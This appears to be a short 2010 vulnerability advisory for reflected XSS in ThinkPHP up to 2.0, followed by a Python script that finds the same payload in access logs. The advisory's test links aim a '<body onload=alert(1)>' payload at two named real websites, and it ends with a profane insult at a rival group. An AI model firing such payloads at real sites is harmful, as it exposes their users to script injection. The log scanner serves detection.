# Title: ThinkPHP <= 2.0 XSS Vulnerability
# Date: 9/2/2010
# Author: zx
# Software Link: http://www.thinkphp.cn/Down/
# Version: <= 2.0
# Tested on: IE6/7 & Firefox

XSS Vulnerability :

Test Link :

ThinkPHP 2.0
http://game.baofeng.com/ucenter/index.php?s=1%3Cbody+onload=alert(1)%3E

ThinkPHP 1.5
http://ask.lenovo.com.cn/index.php?s=1%3Cbody+onload=alert(1)%3E

# zx_at_bbs.!ntra.sd*.c0m

# Finally, Fuck you ->Securitylab.ir<- the truly thief of Iran!! Spring Brother will blast ur Ass!!!
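For sites still running an affected ThinkPHP release, the request shape in the test links above (HTML markup carried in the `s` routing parameter) can be searched for in web server access logs. The following is an added example, not part of the original advisory or of ThinkPHP; it assumes combined-format access logs, and the function names and sample log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote_plus

# Request line inside a combined-format access log entry (assumed log format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# Markup that has no place in a routing parameter: a tag opener or an
# inline event-handler attribute such as onload=.
MARKUP_RE = re.compile(r'<\s*/?\s*[a-z!]|\bon[a-z]+\s*=', re.IGNORECASE)

def decode_fully(value, max_rounds=3):
    """Undo repeated URL-encoding (%253C -> %3C -> <), with a bounded loop."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_s_param(log_line):
    """Return the decoded `s` value if it carries HTML markup, else None."""
    match = REQUEST_RE.search(log_line)
    if not match:
        return None
    query = urlsplit(match.group(1)).query
    # parse_qsl splits each pair on the first '=' only and decodes once.
    for name, value in parse_qsl(query, keep_blank_values=True):
        if name == "s":
            value = decode_fully(value)
            if MARKUP_RE.search(value):
                return value
    return None

def scan(lines):
    """Return (line_number, decoded_value) for every flagged log line."""
    hits = []
    for number, line in enumerate(lines, start=1):
        value = suspicious_s_param(line)
        if value is not None:
            hits.append((number, value))
    return hits

# Constructed sample log lines (documentation IP range, made-up timestamps).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /index.php?s=/Index/index HTTP/1.1" 200 5120',
    '192.0.2.11 - - [01/Jan/2024:10:00:02 +0000] "GET /index.php?s=1%3Cbody+onload=alert(1)%3E HTTP/1.1" 200 4311',
    '192.0.2.12 - - [01/Jan/2024:10:00:03 +0000] "GET /index.php?s=1%253Cbody%2520onload%3Dalert(1)%253E HTTP/1.1" 200 4311',
    '192.0.2.13 - - [01/Jan/2024:10:00:04 +0000] "GET /index.php?q=%3Cb%3E HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, value in scan(SAMPLE_LOG):
        print(f"line {number}: s={value!r}")
```

A hit only shows that such a request was received; whether the markup was reflected unescaped depends on the ThinkPHP version serving it.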